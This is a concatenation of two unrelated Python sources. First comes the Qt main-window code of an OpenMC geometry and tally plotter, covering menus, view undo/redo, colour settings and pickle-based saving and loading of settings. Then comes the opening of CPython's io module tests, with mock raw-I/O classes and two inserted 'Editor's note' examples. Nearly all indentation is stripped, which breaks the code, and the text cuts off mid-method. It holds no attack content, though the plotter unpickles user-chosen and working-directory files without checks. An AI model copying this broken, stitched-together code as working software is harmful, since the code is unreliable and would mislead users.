self.xzAction.setStatusTip('Change to xz basis')
xz_connector = partial(self.editBasis, 'xz', apply=True)
self.xzAction.triggered.connect(xz_connector)
self.yzAction = QAction('&yz ', self)
self.yzAction.setCheckable(True)
self.yzAction.setShortcut('Alt+Y')
self.yzAction.setToolTip('Change to yz basis')
self.yzAction.setStatusTip('Change to yz basis')
yz_connector = partial(self.editBasis, 'yz', apply=True)
self.yzAction.triggered.connect(yz_connector)
self.basisMenu = self.editMenu.addMenu('&Basis')
self.basisMenu.addAction(self.xyAction)
self.basisMenu.addAction(self.xzAction)
self.basisMenu.addAction(self.yzAction)
self.basisMenu.aboutToShow.connect(self.updateBasisMenu)
# Edit -> Color By Menu
self.cellAction = QAction('&Cell', self)
self.cellAction.setCheckable(True)
self.cellAction.setShortcut('Alt+C')
self.cellAction.setToolTip('Color by cell')
self.cellAction.setStatusTip('Color plot by cell')
cell_connector = partial(self.editColorBy, 'cell', apply=True)
self.cellAction.triggered.connect(cell_connector)
self.materialAction = QAction('&Material', self)
self.materialAction.setCheckable(True)
self.materialAction.setShortcut('Alt+M')
self.materialAction.setToolTip('Color by material')
self.materialAction.setStatusTip('Color plot by material')
material_connector = partial(self.editColorBy, 'material', apply=True)
self.materialAction.triggered.connect(material_connector)
self.temperatureAction = QAction('&Temperature', self)
self.temperatureAction.setCheckable(True)
self.temperatureAction.setShortcut('Alt+T')
self.temperatureAction.setToolTip('Color by temperature')
self.temperatureAction.setStatusTip('Color plot by temperature')
temp_connector = partial(self.editColorBy, 'temperature', apply=True)
self.temperatureAction.triggered.connect(temp_connector)
self.densityAction = QAction('&Density', self)
self.densityAction.setCheckable(True)
self.densityAction.setShortcut('Alt+D')
self.densityAction.setToolTip('Color by density')
self.densityAction.setStatusTip('Color plot by density')
density_connector = partial(self.editColorBy, 'density', apply=True)
self.densityAction.triggered.connect(density_connector)
self.colorbyMenu = self.editMenu.addMenu('&Color By')
self.colorbyMenu.addAction(self.cellAction)
self.colorbyMenu.addAction(self.materialAction)
self.colorbyMenu.addAction(self.temperatureAction)
self.colorbyMenu.addAction(self.densityAction)
self.colorbyMenu.aboutToShow.connect(self.updateColorbyMenu)
self.editMenu.addSeparator()
# Edit -> Other Options
self.maskingAction = QAction('Enable &Masking', self)
self.maskingAction.setShortcut('Ctrl+M')
self.maskingAction.setCheckable(True)
self.maskingAction.setToolTip('Toggle masking')
self.maskingAction.setStatusTip('Toggle whether masking is enabled')
masking_connector = partial(self.toggleMasking, apply=True)
self.maskingAction.toggled.connect(masking_connector)
self.editMenu.addAction(self.maskingAction)
self.highlightingAct = QAction('Enable High&lighting', self)
self.highlightingAct.setShortcut('Ctrl+L')
self.highlightingAct.setCheckable(True)
self.highlightingAct.setToolTip('Toggle highlighting')
self.highlightingAct.setStatusTip('Toggle whether '
'highlighting is enabled')
highlight_connector = partial(self.toggleHighlighting, apply=True)
self.highlightingAct.toggled.connect(highlight_connector)
self.editMenu.addAction(self.highlightingAct)
self.overlapAct = QAction('Enable Overlap Coloring', self)
self.overlapAct.setShortcut('Ctrl+P')
self.overlapAct.setCheckable(True)
self.overlapAct.setToolTip('Toggle overlapping regions')
self.overlapAct.setStatusTip('Toggle display of overlapping '
'regions when enabled')
overlap_connector = partial(self.toggleOverlaps, apply=True)
self.overlapAct.toggled.connect(overlap_connector)
self.editMenu.addAction(self.overlapAct)
self.outlineAct = QAction('Enable Domain Outlines', self)
self.outlineAct.setShortcut('Ctrl+U')
self.outlineAct.setCheckable(True)
self.outlineAct.setToolTip('Display Cell/Material Boundaries')
self.outlineAct.setStatusTip('Toggle display of domain '
'outlines when enabled')
outline_connector = partial(self.toggleOutlines, apply=True)
self.outlineAct.toggled.connect(outline_connector)
self.editMenu.addAction(self.outlineAct)
# View Menu
self.dockAction = QAction('Hide &Dock', self)
self.dockAction.setShortcut("Ctrl+D")
self.dockAction.setToolTip('Toggle dock visibility')
self.dockAction.setStatusTip('Toggle dock visibility')
self.dockAction.triggered.connect(self.toggleDockView)
self.tallyDockAction = QAction('Tally &Dock', self)
self.tallyDockAction.setShortcut("Ctrl+T")
self.tallyDockAction.setToolTip('Toggle tally dock visibility')
self.tallyDockAction.setStatusTip('Toggle tally dock visibility')
self.tallyDockAction.triggered.connect(self.toggleTallyDockView)
self.zoomAction = QAction('&Zoom...', self)
self.zoomAction.setShortcut('Alt+Shift+Z')
self.zoomAction.setToolTip('Edit zoom factor')
self.zoomAction.setStatusTip('Edit zoom factor')
self.zoomAction.triggered.connect(self.editZoomAct)
self.viewMenu = self.mainMenu.addMenu('&View')
self.viewMenu.addAction(self.dockAction)
self.viewMenu.addAction(self.tallyDockAction)
self.viewMenu.addSeparator()
self.viewMenu.addAction(self.zoomAction)
self.viewMenu.aboutToShow.connect(self.updateViewMenu)
# Window Menu
self.mainWindowAction = QAction('&Main Window', self)
self.mainWindowAction.setCheckable(True)
self.mainWindowAction.setToolTip('Bring main window to front')
self.mainWindowAction.setStatusTip('Bring main window to front')
self.mainWindowAction.triggered.connect(self.showMainWindow)
self.colorDialogAction = QAction('Color &Options', self)
self.colorDialogAction.setCheckable(True)
self.colorDialogAction.setToolTip('Bring Color Dialog to front')
self.colorDialogAction.setStatusTip('Bring Color Dialog to front')
self.colorDialogAction.triggered.connect(self.showColorDialog)
# Keyboard Shortcuts Overlay
self.keyboardShortcutsAction = QAction("&Keyboard Shortcuts...", self)
self.keyboardShortcutsAction.setShortcut("?")
self.keyboardShortcutsAction.setToolTip("Display Keyboard Shortcuts")
self.keyboardShortcutsAction.setStatusTip("Display Keyboard Shortcuts")
self.keyboardShortcutsAction.triggered.connect(self.toggleShortcuts)
self.windowMenu = self.mainMenu.addMenu('&Window')
self.windowMenu.addAction(self.mainWindowAction)
self.windowMenu.addAction(self.colorDialogAction)
self.windowMenu.addAction(self.keyboardShortcutsAction)
self.windowMenu.aboutToShow.connect(self.updateWindowMenu)
def updateEditMenu(self):
changed = self.model.currentView != self.model.defaultView
self.restoreAction.setDisabled(not changed)
self.maskingAction.setChecked(self.model.currentView.masking)
self.highlightingAct.setChecked(self.model.currentView.highlighting)
self.outlineAct.setChecked(self.model.currentView.outlines)
num_previous_views = len(self.model.previousViews)
self.undoAction.setText('&Undo ({})'.format(num_previous_views))
num_subsequent_views = len(self.model.subsequentViews)
self.redoAction.setText('&Redo ({})'.format(num_subsequent_views))
def updateBasisMenu(self):
self.xyAction.setChecked(self.model.currentView.basis == 'xy')
self.xzAction.setChecked(self.model.currentView.basis == 'xz')
self.yzAction.setChecked(self.model.currentView.basis == 'yz')
def updateColorbyMenu(self):
cv = self.model.currentView
self.cellAction.setChecked(cv.colorby == 'cell')
self.materialAction.setChecked(cv.colorby == 'material')
self.temperatureAction.setChecked(cv.colorby == 'temperature')
self.densityAction.setChecked(cv.colorby == 'density')
def updateViewMenu(self):
if self.dock.isVisible():
self.dockAction.setText('Hide &Dock')
else:
self.dockAction.setText('Show &Dock')
def updateWindowMenu(self):
self.colorDialogAction.setChecked(self.colorDialog.isActiveWindow())
self.mainWindowAction.setChecked(self.isActiveWindow())
# Menu and shared methods
def loadModel(self, reload=False):
if reload:
self.resetModels()
else:
# create new plot model
self.model = PlotModel()
self.restoreModelSettings()
# update plot and model settings
self.updateRelativeBases()
self.cellsModel = DomainTableModel(self.model.activeView.cells)
self.materialsModel = DomainTableModel(self.model.activeView.materials)
if reload:
loader_thread = Thread(target=_openmcReload)
loader_thread.start()
while loader_thread.is_alive():
self.statusBar().showMessage("Reloading model...")
QApplication.processEvents()
self.plotIm.model = self.model
self.applyChanges()
def saveImage(self):
filename, ext = QFileDialog.getSaveFileName(self,
"Save Plot Image",
"untitled",
"Images (*.png)")
if filename:
if "." not in filename:
filename += ".png"
self.plotIm.figure.savefig(filename, transparent=True)
self.statusBar().showMessage('Plot Image Saved', 5000)
def saveView(self):
filename, ext = QFileDialog.getSaveFileName(self,
"Save View Settings",
"untitled",
"View Settings (*.pltvw)")
if filename:
if "." not in filename:
filename += ".pltvw"
saved = {'version': self.model.version,
'current': self.model.currentView}
with open(filename, 'wb') as file:
pickle.dump(saved, file)
def openView(self):
filename, ext = QFileDialog.getOpenFileName(self, "Open View Settings",
".", "*.pltvw")
if filename:
try:
with open(filename, 'rb') as file:
saved = pickle.load(file)
except Exception:
message = 'Error loading plot settings'
saved = {'version': None,
'current': None}
if saved['version'] == self.model.version:
self.model.activeView = saved['current']
self.dock.updateDock()
self.colorDialog.updateDialogValues()
self.applyChanges()
message = '{} settings loaded'.format(filename)
else:
message = 'Error loading plot settings. Incompatible model.'
self.statusBar().showMessage(message, 5000)
def openStatePoint(self):
        # check for an already-open statepoint
if self.model.statepoint:
msg_box = QMessageBox()
msg_box.setText("Please close the current statepoint file before "
"opening a new one.")
msg_box.setIcon(QMessageBox.Information)
msg_box.setStandardButtons(QMessageBox.Ok)
msg_box.exec_()
return
filename, ext = QFileDialog.getOpenFileName(self, "Open StatePoint",
".", "statepoint*.h5")
if filename:
try:
self.model.openStatePoint(filename)
message = 'Opened statepoint file: {}'
except (FileNotFoundError, OSError):
message = 'Error opening statepoint file: {}'
msg_box = QMessageBox()
msg = "Could not open statepoint file: \n\n {} \n"
msg_box.setText(msg.format(filename))
msg_box.setIcon(QMessageBox.Warning)
msg_box.setStandardButtons(QMessageBox.Ok)
msg_box.exec_()
finally:
self.statusBar().showMessage(message.format(filename), 5000)
self.updateDataMenu()
self.tallyDock.update()
def closeStatePoint(self):
# remove the statepoint object and update the data menu
filename = self.model.statepoint.filename
self.model.statepoint = None
self.model.currentView.selectedTally = None
self.model.activeView.selectedTally = None
msg = "Closed statepoint file {}".format(filename)
self.statusBar().showMessage(msg)
self.updateDataMenu()
self.tallyDock.selectTally()
self.tallyDock.update()
self.plotIm.updatePixmap()
def updateDataMenu(self):
if self.model.statepoint:
self.closeStatePointAction = QAction("&Close statepoint", self)
self.closeStatePointAction.setToolTip("Close current statepoint")
self.closeStatePointAction.triggered.connect(self.closeStatePoint)
self.dataMenu.addAction(self.closeStatePointAction)
elif hasattr(self, "closeStatePointAction"):
self.dataMenu.removeAction(self.closeStatePointAction)
def applyChanges(self):
if self.model.activeView != self.model.currentView:
self.statusBar().showMessage('Generating Plot...')
QApplication.processEvents()
self.model.storeCurrent()
self.model.subsequentViews = []
self.plotIm.generatePixmap()
self.resetModels()
self.showCurrentView()
self.statusBar().showMessage('')
else:
self.statusBar().showMessage('No changes to apply.', 3000)
def undo(self):
self.statusBar().showMessage('Generating Plot...')
QApplication.processEvents()
self.model.undo()
self.resetModels()
self.showCurrentView()
self.dock.updateDock()
self.colorDialog.updateDialogValues()
if not self.model.previousViews:
self.undoAction.setDisabled(True)
self.redoAction.setDisabled(False)
self.statusBar().showMessage('')
def redo(self):
self.statusBar().showMessage('Generating Plot...')
QApplication.processEvents()
self.model.redo()
self.resetModels()
self.showCurrentView()
self.dock.updateDock()
self.colorDialog.updateDialogValues()
if not self.model.subsequentViews:
self.redoAction.setDisabled(True)
self.undoAction.setDisabled(False)
self.statusBar().showMessage('')
def restoreDefault(self):
if self.model.currentView != self.model.defaultView:
self.statusBar().showMessage('Generating Plot...')
QApplication.processEvents()
self.model.storeCurrent()
self.model.activeView.adopt_plotbase(self.model.defaultView)
self.plotIm.generatePixmap()
self.resetModels()
self.showCurrentView()
self.dock.updateDock()
self.colorDialog.updateDialogValues()
self.model.subsequentViews = []
self.statusBar().showMessage('')
def editBasis(self, basis, apply=False):
self.model.activeView.basis = basis
self.dock.updateBasis()
if apply:
self.applyChanges()
def editColorBy(self, domain_kind, apply=False):
self.model.activeView.colorby = domain_kind
self.dock.updateColorBy()
self.colorDialog.updateColorBy()
if apply:
self.applyChanges()
def editUniverseLevel(self, level, apply=False):
if level in ('all', ''):
self.model.activeView.level = -1
else:
self.model.activeView.level = int(level)
self.dock.updateUniverseLevel()
self.colorDialog.updateUniverseLevel()
if apply:
self.applyChanges()
def toggleOverlaps(self, state, apply=False):
self.model.activeView.color_overlaps = bool(state)
self.colorDialog.updateOverlap()
if apply:
self.applyChanges()
def editColorMap(self, colormap_name, property_type, apply=False):
self.model.activeView.colormaps[property_type] = colormap_name
self.plotIm.updateColorMap(colormap_name, property_type)
self.colorDialog.updateColorMaps()
if apply:
self.applyChanges()
def editColorbarMin(self, min_val, property_type, apply=False):
av = self.model.activeView
current = av.user_minmax[property_type]
av.user_minmax[property_type] = (min_val, current[1])
self.colorDialog.updateColorMinMax()
self.plotIm.updateColorMinMax(property_type)
if apply:
self.applyChanges()
def editColorbarMax(self, max_val, property_type, apply=False):
av = self.model.activeView
current = av.user_minmax[property_type]
av.user_minmax[property_type] = (current[0], max_val)
self.colorDialog.updateColorMinMax()
self.plotIm.updateColorMinMax(property_type)
if apply:
self.applyChanges()
def toggleColorbarScale(self, state, property, apply=False):
av = self.model.activeView
av.color_scale_log[property] = bool(state)
        # temporary, should be resolved differently in the future
cv = self.model.currentView
cv.color_scale_log[property] = bool(state)
self.plotIm.updateColorbarScale()
if apply:
self.applyChanges()
def toggleUserMinMax(self, state, property):
av = self.model.activeView
av.use_custom_minmax[property] = bool(state)
if av.user_minmax[property] == (0.0, 0.0):
av.user_minmax[property] = copy.copy(av.data_minmax[property])
self.plotIm.updateColorMinMax('temperature')
self.plotIm.updateColorMinMax('density')
self.colorDialog.updateColorMinMax()
def toggleDataIndicatorCheckBox(self, state, property, apply=False):
av = self.model.activeView
av.data_indicator_enabled[property] = bool(state)
cv = self.model.currentView
cv.data_indicator_enabled[property] = bool(state)
self.plotIm.updateDataIndicatorVisibility()
if apply:
self.applyChanges()
def toggleMasking(self, state, apply=False):
self.model.activeView.masking = bool(state)
self.colorDialog.updateMasking()
if apply:
self.applyChanges()
def toggleHighlighting(self, state, apply=False):
self.model.activeView.highlighting = bool(state)
self.colorDialog.updateHighlighting()
if apply:
self.applyChanges()
def toggleDockView(self):
if self.dock.isVisible():
self.dock.hide()
if not self.isMaximized() and not self.dock.isFloating():
self.resize(self.width() - self.dock.width(), self.height())
else:
self.dock.setVisible(True)
if not self.isMaximized() and not self.dock.isFloating():
self.resize(self.width() + self.dock.width(), self.height())
self.resizePixmap()
self.showMainWindow()
def toggleTallyDockView(self):
if self.tallyDock.isVisible():
self.tallyDock.hide()
if not self.isMaximized() and not self.tallyDock.isFloating():
self.resize(self.width() - self.tallyDock.width(), self.height())
else:
self.tallyDock.setVisible(True)
if not self.isMaximized() and not self.tallyDock.isFloating():
self.resize(self.width() + self.tallyDock.width(), self.height())
self.resizePixmap()
self.showMainWindow()
def editZoomAct(self):
percent, ok = QInputDialog.getInt(self, "Edit Zoom", "Zoom Percent:",
self.dock.zoomBox.value(), 25, 2000)
if ok:
self.dock.zoomBox.setValue(percent)
def editZoom(self, value):
self.zoom = value
self.resizePixmap()
self.dock.zoomBox.setValue(value)
def showMainWindow(self):
self.raise_()
self.activateWindow()
def showColorDialog(self):
self.colorDialog.show()
self.colorDialog.raise_()
self.colorDialog.activateWindow()
def showExportDialog(self):
self.exportDataDialog.show()
self.exportDataDialog.raise_()
self.exportDataDialog.activateWindow()
# Dock methods:
def editSingleOrigin(self, value, dimension):
self.model.activeView.origin[dimension] = value
def editPlotAlpha(self, value):
self.model.activeView.domainAlpha = value
def editPlotVisibility(self, value):
self.model.activeView.domainVisible = bool(value)
def toggleOutlines(self, value, apply=False):
self.model.activeView.outlines = bool(value)
self.dock.updateOutlines()
if apply:
self.applyChanges()
def editWidth(self, value):
self.model.activeView.width = value
self.onRatioChange()
self.dock.updateWidth()
def editHeight(self, value):
self.model.activeView.height = value
self.onRatioChange()
self.dock.updateHeight()
def toggleAspectLock(self, state):
self.model.activeView.aspectLock = bool(state)
self.onRatioChange()
self.dock.updateAspectLock()
def editVRes(self, value):
self.model.activeView.v_res = value
self.dock.updateVRes()
def editHRes(self, value):
self.model.activeView.h_res = value
self.onRatioChange()
self.dock.updateHRes()
# Color dialog methods:
def editMaskingColor(self):
current_color = self.model.activeView.maskBackground
dlg = QColorDialog(self)
dlg.setCurrentColor(QtGui.QColor.fromRgb(*current_color))
if dlg.exec_():
new_color = dlg.currentColor().getRgb()[:3]
self.model.activeView.maskBackground = new_color
self.colorDialog.updateMaskingColor()
def editHighlightColor(self):
current_color = self.model.activeView.highlightBackground
dlg = QColorDialog(self)
dlg.setCurrentColor(QtGui.QColor.fromRgb(*current_color))
if dlg.exec_():
new_color = dlg.currentColor().getRgb()[:3]
self.model.activeView.highlightBackground = new_color
self.colorDialog.updateHighlightColor()
def editAlpha(self, value):
self.model.activeView.highlightAlpha = value
def editSeed(self, value):
self.model.activeView.highlightSeed = value
def editOverlapColor(self, apply=False):
current_color = self.model.activeView.overlap_color
dlg = QColorDialog(self)
dlg.setCurrentColor(QtGui.QColor.fromRgb(*current_color))
if dlg.exec_():
new_color = dlg.currentColor().getRgb()[:3]
self.model.activeView.overlap_color = new_color
self.colorDialog.updateOverlapColor()
if apply:
self.applyChanges()
def editBackgroundColor(self, apply=False):
current_color = self.model.activeView.domainBackground
dlg = QColorDialog(self)
dlg.setCurrentColor(QtGui.QColor.fromRgb(*current_color))
if dlg.exec_():
new_color = dlg.currentColor().getRgb()[:3]
self.model.activeView.domainBackground = new_color
self.colorDialog.updateBackgroundColor()
if apply:
self.applyChanges()
def resetColors(self):
self.model.resetColors()
self.colorDialog.updateDialogValues()
self.applyChanges()
# Tally dock methods
def editSelectedTally(self, event):
av = self.model.activeView
if event is None or event == "None" or event == "":
av.selectedTally = None
else:
av.selectedTally = int(event.split()[1])
self.tallyDock.selectTally(event)
def editTallyValue(self, event):
av = self.model.activeView
av.tallyValue = event
def updateScores(self, state):
self.tallyDock.updateScores()
def updateNuclides(self, state):
self.tallyDock.updateNuclides()
def toggleTallyVisibility(self, state, apply=False):
av = self.model.activeView
av.tallyDataVisible = bool(state)
if apply:
self.applyChanges()
def toggleTallyLogScale(self, state, apply=False):
av = self.model.activeView
av.tallyDataLogScale = bool(state)
if apply:
self.applyChanges()
def toggleTallyMaskZero(self, state):
av = self.model.activeView
av.tallyMaskZeroValues = bool(state)
def editTallyAlpha(self, value, apply=False):
av = self.model.activeView
av.tallyDataAlpha = value
if apply:
self.applyChanges()
def toggleTallyContours(self, state):
av = self.model.activeView
av.tallyContours = bool(state)
def editTallyContourLevels(self, value):
av = self.model.activeView
av.tallyContourLevels = value
def toggleTallyDataIndicator(self, state, apply=False):
av = self.model.activeView
av.tallyDataIndicator = bool(state)
if apply:
self.applyChanges()
def toggleTallyDataClip(self, state):
av = self.model.activeView
av.clipTallyData = bool(state)
def toggleTallyDataUserMinMax(self, state, apply=False):
av = self.model.activeView
av.tallyDataUserMinMax = bool(state)
self.tallyDock.tallyColorForm.setMinMaxEnabled(bool(state))
if apply:
self.applyChanges()
def editTallyDataMin(self, value, apply=False):
av = self.model.activeView
av.tallyDataMin = value
if apply:
self.applyChanges()
def editTallyDataMax(self, value, apply=False):
av = self.model.activeView
av.tallyDataMax = value
if apply:
self.applyChanges()
def editTallyDataColormap(self, cmap, apply=False):
av = self.model.activeView
av.tallyDataColormap = cmap
if apply:
self.applyChanges()
def updateTallyMinMax(self):
self.tallyDock.updateMinMax()
# Plot image methods
def editPlotOrigin(self, xOr, yOr, zOr=None, apply=False):
if zOr is not None:
self.model.activeView.origin = [xOr, yOr, zOr]
else:
origin = [None, None, None]
origin[self.xBasis] = xOr
origin[self.yBasis] = yOr
origin[self.zBasis] = self.model.activeView.origin[self.zBasis]
self.model.activeView.origin = origin
self.dock.updateOrigin()
if apply:
self.applyChanges()
def revertDockControls(self):
self.dock.revertToCurrent()
def editDomainColor(self, kind, id):
if kind == 'Cell':
domain = self.model.activeView.cells
else:
domain = self.model.activeView.materials
current_color = domain[id].color
dlg = QColorDialog(self)
if isinstance(current_color, tuple):
dlg.setCurrentColor(QtGui.QColor.fromRgb(*current_color))
elif isinstance(current_color, str):
current_color = openmc.plots._SVG_COLORS[current_color]
dlg.setCurrentColor(QtGui.QColor.fromRgb(*current_color))
if dlg.exec_():
new_color = dlg.currentColor().getRgb()[:3]
domain[id].color = new_color
self.applyChanges()
def toggleDomainMask(self, state, kind, id):
if kind == 'Cell':
domain = self.model.activeView.cells
else:
domain = self.model.activeView.materials
domain[id].masked = bool(state)
self.applyChanges()
def toggleDomainHighlight(self, state, kind, id):
if kind == 'Cell':
domain = self.model.activeView.cells
else:
domain = self.model.activeView.materials
domain[id].highlight = bool(state)
self.applyChanges()
# Helper methods:
def restoreWindowSettings(self):
settings = QtCore.QSettings()
self.resize(settings.value("mainWindow/Size",
QtCore.QSize(800, 600)))
self.move(settings.value("mainWindow/Position",
QtCore.QPoint(100, 100)))
self.restoreState(settings.value("mainWindow/State"))
self.colorDialog.resize(settings.value("colorDialog/Size",
QtCore.QSize(400, 500)))
self.colorDialog.move(settings.value("colorDialog/Position",
QtCore.QPoint(600, 200)))
is_visible = settings.value("colorDialog/Visible", 0)
# some versions of PySide will return None rather than the default value
if is_visible is None:
is_visible = False
else:
is_visible = bool(int(is_visible))
self.colorDialog.setVisible(is_visible)
def restoreModelSettings(self):
if os.path.isfile("plot_settings.pkl"):
with open('plot_settings.pkl', 'rb') as file:
model = pickle.load(file)
# do not replace model if the version is out of date
if model.version != self.model.version:
print("WARNING: previous plot settings are for a different "
"version of the GUI. They will be ignored.")
wrn_msg = "Existing version: {}, Current GUI version: {}"
print(wrn_msg.format(model.version, self.model.version))
return
try:
self.model.statepoint = model.statepoint
except OSError:
msg_box = QMessageBox()
msg = "Could not open statepoint file: \n\n {} \n"
msg_box.setText(msg.format(self.model.statepoint.filename))
msg_box.setIcon(QMessageBox.Warning)
msg_box.setStandardButtons(QMessageBox.Ok)
msg_box.exec_()
self.model.statepoint = None
self.model.currentView = model.currentView
self.model.activeView = copy.deepcopy(model.currentView)
self.model.previousViews = model.previousViews
self.model.subsequentViews = model.subsequentViews
def resetModels(self):
self.cellsModel = DomainTableModel(self.model.activeView.cells)
self.materialsModel = DomainTableModel(self.model.activeView.materials)
self.cellsModel.beginResetModel()
self.cellsModel.endResetModel()
self.materialsModel.beginResetModel()
self.materialsModel.endResetModel()
self.colorDialog.updateDomainTabs()
def showCurrentView(self):
self.updateScale()
self.updateRelativeBases()
self.plotIm.updatePixmap()
if self.model.previousViews:
self.undoAction.setDisabled(False)
if self.model.subsequentViews:
self.redoAction.setDisabled(False)
else:
self.redoAction.setDisabled(True)
self.adjustWindow()
def updateScale(self):
cv = self.model.currentView
self.scale = (cv.h_res / cv.width,
cv.v_res / cv.height)
def updateRelativeBases(self):
cv = self.model.currentView
self.xBasis = 0 if cv.basis[0] == 'x' else 1
self.yBasis = 1 if cv.basis[1] == 'y' else 2
self.zBasis = 3 - (self.xBasis + self.yBasis)
def adjustWindow(self):
self.setMaximumSize(self.screen.width(), self.screen.height())
def onRatioChange(self):
av = self.model.activeView
if av.aspectLock:
ratio = av.width / max(av.height, .001)
av.v_res = int(av.h_res / ratio)
self.dock.updateVRes()
def showCoords(self, xPlotPos, yPlotPos):
cv = self.model.currentView
if cv.basis == 'xy':
coords = ("({}, {}, {})".format(round(xPlotPos, 2),
round(yPlotPos, 2),
round(cv.origin[2], 2)))
elif cv.basis == 'xz':
coords = ("({}, {}, {})".format(round(xPlotPos, 2),
round(cv.origin[1], 2),
round(yPlotPos, 2)))
else:
coords = ("({}, {}, {})".format(round(cv.origin[0], 2),
round(xPlotPos, 2),
round(yPlotPos, 2)))
self.coord_label.setText('{}'.format(coords))
def resizePixmap(self):
self.plotIm._resize()
self.plotIm.adjustSize()
def moveEvent(self, event):
self.adjustWindow()
def resizeEvent(self, event):
self.plotIm._resize()
self.adjustWindow()
self.updateScale()
if self.shortcutOverlay.isVisible():
self.shortcutOverlay.resize(self.width(), self.height())
def closeEvent(self, event):
settings = QtCore.QSettings()
settings.setValue("mainWindow/Size", self.size())
settings.setValue("mainWindow/Position", self.pos())
settings.setValue("mainWindow/State", self.saveState())
settings.setValue("colorDialog/Size", self.colorDialog.size())
settings.setValue("colorDialog/Position", self.colorDialog.pos())
visible = int(self.colorDialog.isVisible())
settings.setValue("colorDialog/Visible", visible)
openmc.lib.finalize()
self.saveSettings()
def saveSettings(self):
if len(self.model.previousViews) > 10:
self.model.previousViews = self.model.previousViews[-10:]
if len(self.model.subsequentViews) > 10:
self.model.subsequentViews = self.model.subsequentViews[-10:]
with open('plot_settings.pkl', 'wb') as file:
if self.model.statepoint:
self.model.statepoint.close()
pickle.dump(self.model, file)
def exportTallyData(self):
# show export tool dialog
self.showExportDialog()
test_io.py
"""Unit tests for the io module."""
# Tests of io are scattered over the test suite:
# * test_bufio - tests file buffering
# * test_memoryio - tests BytesIO and StringIO
# * test_fileio - tests FileIO
# * test_file - tests the file interface
# * test_io - tests everything else in the io module
# * test_univnewlines - tests universal newline support
# * test_largefile - tests operations on a file greater than 2**32 bytes
# (only enabled with -ulargefile)
################################################################################
# ATTENTION TEST WRITERS!!!
################################################################################
# When writing tests for io, it's important to test both the C and Python
# implementations. This is usually done by writing a base test that refers to
# the type it is testing as an attribute. Then it provides custom subclasses to
# test both implementations. This file has lots of examples.
################################################################################
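# ------------------------------------------------------------------------------
# Editor's note: a minimal, hypothetical sketch of the dual-implementation
# pattern described above; it is not part of the original test suite and the
# Example* names are illustrative only.  The shared logic lives in a mixin that
# refers to the implementation under test through a ``tp`` attribute, and one
# concrete subclass binds ``tp`` to the C implementation (io) while the other
# binds it to the pure-Python one (_pyio).
import unittest
import io                  # C implementation of the io module
import _pyio as pyio       # pure-Python implementation
class _ExampleBytesIOTests:
    """Mixin with the shared test logic; subclasses supply ``tp``."""
    tp = None
    def test_roundtrip(self):
        buf = self.tp(b"abc")               # instantiate the implementation under test
        self.assertEqual(buf.read(), b"abc")
class CExampleBytesIOTest(_ExampleBytesIOTests, unittest.TestCase):
    tp = io.BytesIO        # bind the C implementation
class PyExampleBytesIOTest(_ExampleBytesIOTests, unittest.TestCase):
    tp = pyio.BytesIO      # bind the pure-Python implementation
# ------------------------------------------------------------------------------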
import abc
import array
import errno
import locale
import os
import pickle
import random
import signal
import sys
import time
import unittest
import warnings
import weakref
from collections import deque, UserList
from itertools import cycle, count
from test import support
from test.support.script_helper import assert_python_ok, run_python_until_end
import codecs
import io # C implementation of io
import _pyio as pyio # Python implementation of io
try:
import threading
except ImportError:
threading = None
def _default_chunk_size():
"""Get the default TextIOWrapper chunk size"""
with open(__file__, "r", encoding="latin-1") as f:
return f._CHUNK_SIZE
class MockRawIOWithoutRead:
"""A RawIO implementation without read(), so as to exercise the default
RawIO.read() which calls readinto()."""
def __init__(self, read_stack=()):
self._read_stack = list(read_stack)
self._write_stack = []
self._reads = 0
self._extraneous_reads = 0
def write(self, b):
self._write_stack.append(bytes(b))
return len(b)
def writable(self):
return True
def fileno(self):
return 42
def readable(self):
return True
def seekable(self):
return True
def seek(self, pos, whence):
return 0 # wrong but we gotta return something
def tell(self):
return 0 # same comment as above
def readinto(self, buf):
self._reads += 1
max_len = len(buf)
try:
data = self._read_stack[0]
except IndexError:
self._extraneous_reads += 1
return 0
if data is None:
del self._read_stack[0]
return None
n = len(data)
if len(data) <= max_len:
del self._read_stack[0]
buf[:n] = data
return n
else:
buf[:] = data[:max_len]
self._read_stack[0] = data[max_len:]
return max_len
def truncate(self, pos=None):
return pos
class CMockRawIOWithoutRead(MockRawIOWithoutRead, io.RawIOBase):
pass
class PyMockRawIOWithoutRead(MockRawIOWithoutRead, pyio.RawIOBase):
pass
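# Editor's note: a small, hypothetical demonstration (not part of the original
# suite) of what the mock above exercises -- the default RawIOBase.read()
# allocates a buffer and delegates to readinto(), so a raw class only needs to
# implement readinto() to be readable.
def _demo_default_read_uses_readinto():
    raw = CMockRawIOWithoutRead((b"spam",))
    data = raw.read(4)        # inherited RawIOBase.read() calls our readinto()
    assert data == b"spam"
    assert raw._reads == 1    # readinto() ran exactly once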
class MockRawIO(MockRawIOWithoutRead):
def read(self, n=None):
self._reads += 1
try:
return self._read_stack.pop(0)
except:
self._extraneous_reads += 1
return b""
class CMockRawIO(MockRawIO, io.RawIOBase):
pass
class PyMockRawIO(MockRawIO, pyio.RawIOBase):
pass
class MisbehavedRawIO(MockRawIO):
def write(self, b):
return super().write(b) * 2
def read(self, n=None):
return super().read(n) * 2
def seek(self, pos, whence):
return -123
def tell(self):
return -456
def readinto(self, buf):
super().readinto(buf)
return len(buf) * 5
class CMisbehavedRawIO(MisbehavedRawIO, io.RawIOBase):
pass
class PyMisbehavedRawIO(MisbehavedRawIO, pyio.RawIOBase):
pass
class CloseFailureIO(MockRawIO):
closed = 0
def close(self):
if not self.closed:
self.closed = 1
raise OSError
class CCloseFailureIO(CloseFailureIO, io.RawIOBase):
pass
class PyCloseFailureIO(CloseFailureIO, pyio.RawIOBase):
pass
class MockFileIO:
def __init__(self, data):
self.read_history = []
super().__init__(data)
def read(self, n=None):
res = super().read(n)
self.read_history.append(None if res is None else len(res))
return res
def readinto(self, b):
res = super().readinto(b)
self.read_history.append(res)
return res
class CMockFileIO(MockFileIO, io.BytesIO):
pass
class PyMockFileIO(MockFileIO, pyio.BytesIO):
pass
class MockUnseekableIO:
def seekable(self):
return False
def seek(self, *args):
raise self.UnsupportedOperation("not seekable")
def tell(self, *args):
raise self.UnsupportedOperation("not seekable")
class CMockUnseekableIO(MockUnseekableIO, io.BytesIO):
UnsupportedOperation = io.UnsupportedOperation
class PyMockUnseekableIO(MockUnseekableIO, pyio.BytesIO):
UnsupportedOperation = pyio.UnsupportedOperation
class MockNonBlockWriterIO:
def __init__(self):
self._write_stack = []
self._blocker_char = None
def pop_written(self):
s = b"".join(self._write_stack)
self._write_stack[:] = []
return s
def block_on(self, char):
"""Block when a given char is encountered."""
self._blocker_char = char
def readable(self):
return True
def seekable(self):
